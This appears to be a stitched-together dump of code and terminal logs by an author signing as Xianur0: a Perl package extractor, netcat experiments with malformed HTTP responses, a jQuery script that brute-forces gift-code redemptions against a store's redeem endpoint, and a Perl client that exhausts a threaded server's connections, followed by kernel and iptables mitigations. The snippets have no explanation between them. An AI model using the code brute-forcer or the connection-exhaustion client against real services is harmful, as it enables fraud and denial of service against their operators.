my $arg1 = $ARGV[1] || die(("\t"x3)."Deb2Droid v0.1 by Xianur0\n\nUse: ./export.pl [pool dir] [deb]\n");
my @packages = ($arg1);
our @extraidos = ();
our @depsinstaladas = ();
my $install = 1;
system("mkdir var && mkdir var/lib && mkdir var/lib/dpkg && mkdir var/lib/dpkg/info");
open STATUS,">>var/lib/dpkg/status";
sub copiar {
my ($origen,$destino) = @_;
open(FILES,"<".$origen) || return 0;
my $contenido = "";
binmode FILES;
while(<FILES>) {
$contenido .=$_;
}
close(FILES);
open FILED,">".$destino;
binmode FILED;
print FILED $contenido;
close(FILED);
}
sub locatedep {
my ($dir,$dep) = @_;
$dir .= "/" if($dir !~ /\/$/);
my @files = <$dir*>;
foreach my $file (@files) {
my $tmpfile = $file;
$tmpfile =~ s/^.+\///g;
if(-d $file) {
if($file !~ /^\.+$/){
return 1 if(locatedep($file,$dep));
}
}
elsif(-f $file && $dep eq substr($tmpfile,0,length($dep)) && $file =~ /u?deb$/) {
print "[-] Posible paquete encontrado: ".$dep." ? ".$file."\n";
print "ar x ".$file." && (tar -xzvf data.tar.gz > archivos.list) && tar -xzvf control.tar.gz 2>&1\n";
if($install == 1){
print "[-] Extrayendo paquete...\n";
return 1 if(extract($file,$dep));
}
}
}
return 0;
}
sub in_array
{
my ($arr,$search_for) = @_;
my %items = map {$_ => 1} @$arr; # create a hash out of the array values
return (exists($items{$search_for}))?1:0;
}
sub finddeps {
my $searchpackagename = "";
$searchpackagename = $_[0] if($#_ >= 0);
$searchpackagename = "" unless defined $searchpackagename;
open CONTROL,"<control" || return;
open MD5,"<md5sums";
open CONFFILES,"<conffiles";
my $control = "";
my $md5 = "";
my $conffiles = "";
return unless(fileno(MD5));
while(<CONTROL>) {
$control.=$_;
}
close(CONTROL);
my $packagename = "";
$packagename = $1 if($control =~ /Package: ([^\r\n]+)/);
print "Paquete: ".$searchpackagename."=? ".$packagename."\n";
if($searchpackagename ne "" && $searchpackagename ne $packagename) {
return 0;
}
if(fileno(MD5)){
while(<MD5>) {
$md5.=$_;
}
close(MD5);
}
my $status = "Status: install ok not-installed";
if(fileno(CONFFILES)) {
while(<CONFFILES>) {
my $f = $_;
$f =~ s/[\r\n]+//g;
open F, ".".$f;
my $cf = "";
while(<F>){
$cf .= $_;
}
$conffiles.=" ".$f." ".Digest::MD5::md5_hex($cf)."\n";
}
close(CONFFILES);
$control =~ s/(Description:\s+)/Conffiles:\n$conffiles$1/;
$status = "Status: install reinstreq half-configured";
}
checkmd5($md5);
my $depsstring = "";
$depsstring = $1 if($control =~ /Depends: ([^\r\n]+)/);
copiar("archivos.list","var/lib/dpkg/info/".$packagename.".list");
copiar("postinst","var/lib/dpkg/info/".$packagename.".postinst");
copiar("preinst","var/lib/dpkg/info/".$packagename.".preinst");
copiar("postrm","var/lib/dpkg/info/".$packagename.".postrm");
copiar("prerm","var/lib/dpkg/info/".$packagename.".prerm");
open MD5OUT,">>var/lib/dpkg/info/".$packagename.".md5sums";
print MD5OUT $md5;
$md5 = "";
if($depsstring eq ""){
print "[-] Sin dependencias... continuando...\n";
return 1;
}
my @deps = ($depsstring =~ /[^\,]+/g);
my $i = 0;
for $dep (@deps) {
$dep =~ s/^\s+//g;
my $version = $dep;
$version =~ s/(.+\()//g;
$version =~ s/\)//g;
my $condicion = "";
if($version=~/^(>|>=|<=|==|<)\s+([\:\.\d]+)$/){
($condicion,$version) = ($1,$2);
} else {$version="";}
$dep =~ s/\s+.+$//g;
$deps[$i] = $dep;
$i++;
}
print "[-]Instalando dependencias....\n\n";
for $dep (@deps) {
my $cdep = $#deps;
if(!in_array(\@depsinstaladas,$dep)){
push(@depsinstaladas,$dep);
print "[-] Buscando paquete: ".$dep."...\n";
if(!locatedep($base,$dep)) {
die("\n[!] No se pudo resolver la dependencia: ".$dep."\n");
}
}
}
print "[-] Agregando a status...\n";
$control =~s/^Package\:([^\r\n]+)/Package:$1\n$status/;
print $control."\n";
print STATUS $control."\n\n";
print "[-] Instaladas!\n";
return 1;
}
sub extract {
my ($p,$packname) = @_;
if(in_array(\@extraidos,$p)){
return 1;
}
push(@extraidos,$p);
my $descarte = "";
system("ar x ".$p." && (tar -xzvf data.tar.gz > archivos.list) && tar -xzvf control.tar.gz 2>&1");
my $estado = finddeps($packname);
system("rm md5sums 2>&1 | rm control 2>&1 | rm archivos.list 2>&1 | rm debian 2>&1 | rm debian-binary 2>&1 | rm conffiles 2>&1 | rm postinst 2>&1 | rm preinst 2>&1 | rm postrm 2>&1 | rm prerm 2>&1 | rm data.tar.gz 2>&1 | rm control.tar.gz 2>&1 | echo ");
return $estado;
}
sub checkmd5 {
my $md5 = $_[0];
my @lineas = split(/[\r\n]/,$md5);
for $linea (@lineas) {
my ($md5,$objeto) = ($linea =~ /^([\w\d]+)\s+(.+)$/);
open OBJETO,"<".$objeto;
binmode OBJETO;
my $bin = "";
while(<OBJETO>){
$bin .=$_;
}
my $md5real = Digest::MD5::md5_hex($bin);
unless($md5 eq $md5real) {
die("\n[!] MD5 incorrecto: ".$md5."!=".$md5real." en: ${objeto}\n");
} else {
print "\r[-] Probando MD5: ${md5} ${md5real} ${objeto}\r";
}
}
print "\n[-] MD5's correctos!\n";
}
for $package (@packages){
extract($base.$package);
}
print "[-] Paquete y dependencias extraidos correctamente!\n";
HTTP/1.1 200 OK
Content-Type: text/plain; charset=UTF-8
Date: Sun, 13 Jan 2013 02:25:35 GMT
Server: xianur0-to-me
Content-Length: 14
Content-Encoding: gzip
Content-Encoding: none
(respuesta.txt)
# nc -vvvl 8080 > consulta.txt < respuesta.txt
URL: http://localhost:8080/
Zer0-null:/home/xianur0 # cat http.txt
HTTP/1.1 200 OK
Content-Type: text/plain; charset=UTF-8
Date: Sun, 13 Jan 2013 02:25:35 GMT
Server: xianur0-to-me
Xianur0 was here!!
Zer0-null:/home/xianur0 # nc -vvvl 8080 > respuesta.txt < http.txt
Zer0-null:/home/xianur0/lab # cat generador.pl
#!/usr/bin/perl
while(1){
print "Xianur0\n";
}
Zer0-null:/home/xianur0/lab # perl generador.pl | nc -vvvl 8080
Connection from 127.0.0.1 port 8080 [tcp/http-alt] accepted
GET / HTTP/1.1
Host: localhost:8080
Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.11 (KHTML, like Gecko) Chrome/23.0.1271.97 Safari/537.11
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: es-ES,es;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
var x_molder = 0;
function pushToken()
{
// CODIGO DE CANGE, CAMBIAR POR EL TUYO
var str_token = "F9?VQ-D8CQ3-XTRG3-4BDTV-B3X7W";
var charset = "1234567890ABCDEFGHIJKLMNOPQRSTUVWXYZ";
var new_token = str_token.replace("?",charset[x_molder]);
$('#TokenValue').val(new_token)
x_molder++;
$('#RedeemCodeMolder').click();
}
$('#RedeemCodeMolder').click(function ()
{
var postData = 'TokenValue=' + $('#TokenValue').val()+ '&__RequestVerificationToken='+ $('input[name="__RequestVerificationToken"]').val();
$.ajax({
type: 'POST',
url: "/es-MX/RedeemCode/PurchaseWithToken",
data: postData,
cache: false,
success: function(response){
if(response.indexOf("Escribe un código válido") > -1)
{
pushToken();
}
else
{
alert(response);
}
},
error: function(){ alert("Error de peticion AJAX"); }
});
});
pushToken();
use IO::Socket;
use threads;
sub clientes {
my ($client) = @_;
while(<$client>) {
if($_ =~ /sleep/){
print "Durmiendo 10 segs...\n";
sleep(10);
}
}
print $client “Awake!\n”;
print “Cerrando conexión...\n";
close($client)
}
my $sock = new IO::Socket::INET (
LocalPort => '8080',
Proto => 'tcp',
Listen => 2,
Reuse => 1,
);
die "Could not create socket: $!\n" unless $sock;
while(my $new_sock = $sock->accept()) {
print "Nuevo cliente (".$new_sock->peerhost().") :D\n";
threads->create('clientes', $new_sock);
}
close($sock);
Zer0-null:/home/xianur0 # nc -vvvv localhost 8080
nc: connect to localhost port 8080 (tcp) failed: Connection refused
Connection to localhost 8080 port [tcp/http-alt] succeeded!
sleep
^C
Zer0-null:/home/xianur0 # perl server.pl
Nuevo cliente (127.0.0.1) :D
Durmiendo 10 segs...
Cerrando conexión...
use IO::Socket;
while(1){
my $sock = new IO::Socket::INET (
PeerAddr => 'localhost',
PeerPort => '8080',
Proto => 'tcp') || die("No se puede conectar!\n");
print $sock "sleep\n";
close($sock);
}
Zer0-null:/home/xianur0 # perl server.pl
Nuevo cliente (127.0.0.1) :D
Durmiendo 10 segs...
Nuevo cliente (127.0.0.1) :D
Durmiendo 10 segs...
Nuevo cliente (127.0.0.1) :D
[…]
Zer0-null:/home/xianur0 # netstat | grep -i CLOSE_WAIT
tcp 0 0 localhost:http-alt localhost:36338 CLOSE_WAIT
tcp 0 0 localhost:http-alt localhost:36324 CLOSE_WAIT
tcp 0 0 localhost:http-alt localhost:36330 CLOSE_WAIT
tcp 0 0 localhost:http-alt localhost:36320 CLOSE_WAIT
tcp 0 0 localhost:http-alt localhost:36323 CLOSE_WAIT
tcp 1 0 localhost:http-alt localhost:36322 CLOSE_WAIT
tcp 0 0 localhost:http-alt localhost:36313 CLOSE_WAIT
tcp 1 0 localhost:http-alt localhost:36327 CLOSE_WAIT
tcp 0 0 localhost:http-alt localhost:36339 CLOSE_WAIT
tcp 0 0 localhost:http-alt localhost:36331 CLOSE_WAIT
tcp 1 0 localhost:http-alt localhost:36317 CLOSE_WAIT
tcp 0 0 localhost:http-alt localhost:36328 CLOSE_WAIT
tcp 0 0 localhost:http-alt localhost:36319 CLOSE_WAIT
tcp 0 0 localhost:http-alt localhost:36335 CLOSE_WAIT
tcp 0 0 localhost:http-alt localhost:36334 CLOSE_WAIT
tcp 1 0 localhost:http-alt localhost:36318 CLOSE_WAIT
tcp 0 0 localhost:http-alt localhost:36341 CLOSE_WAIT
tcp 0 0 localhost:http-alt localhost:36314 CLOSE_WAIT
tcp 0 0 localhost:http-alt localhost:36315 CLOSE_WAIT
tcp 0 0 localhost:http-alt localhost:36316 CLOSE_WAIT
tcp 0 0 localhost:http-alt localhost:36321 CLOSE_WAIT
tcp 0 0 localhost:http-alt localhost:36325 CLOSE_WAIT
tcp 0 0 localhost:http-alt localhost:36333 CLOSE_WAIT
tcp 0 0 localhost:http-alt localhost:36336 CLOSE_WAIT
tcp 0 0 localhost:http-alt localhost:36340 CLOSE_WAIT
tcp 0 0 localhost:http-alt localhost:36329 CLOSE_WAIT
tcp 0 0 localhost:http-alt localhost:36326 CLOSE_WAIT
/proc/sys/net/ipv4/tcp_retries1 (min)
/proc/sys/net/ipv4/tcp_retries2 (max)
echo 0 > /proc/sys/net/ipv4/tcp_retries1
echo 0 > /proc/sys/net/ipv4/tcp_retries1
iptables -A INPUT -p tcp -m tcp --dport 8080 -m limit --limit 10/sec -j ACCEPT
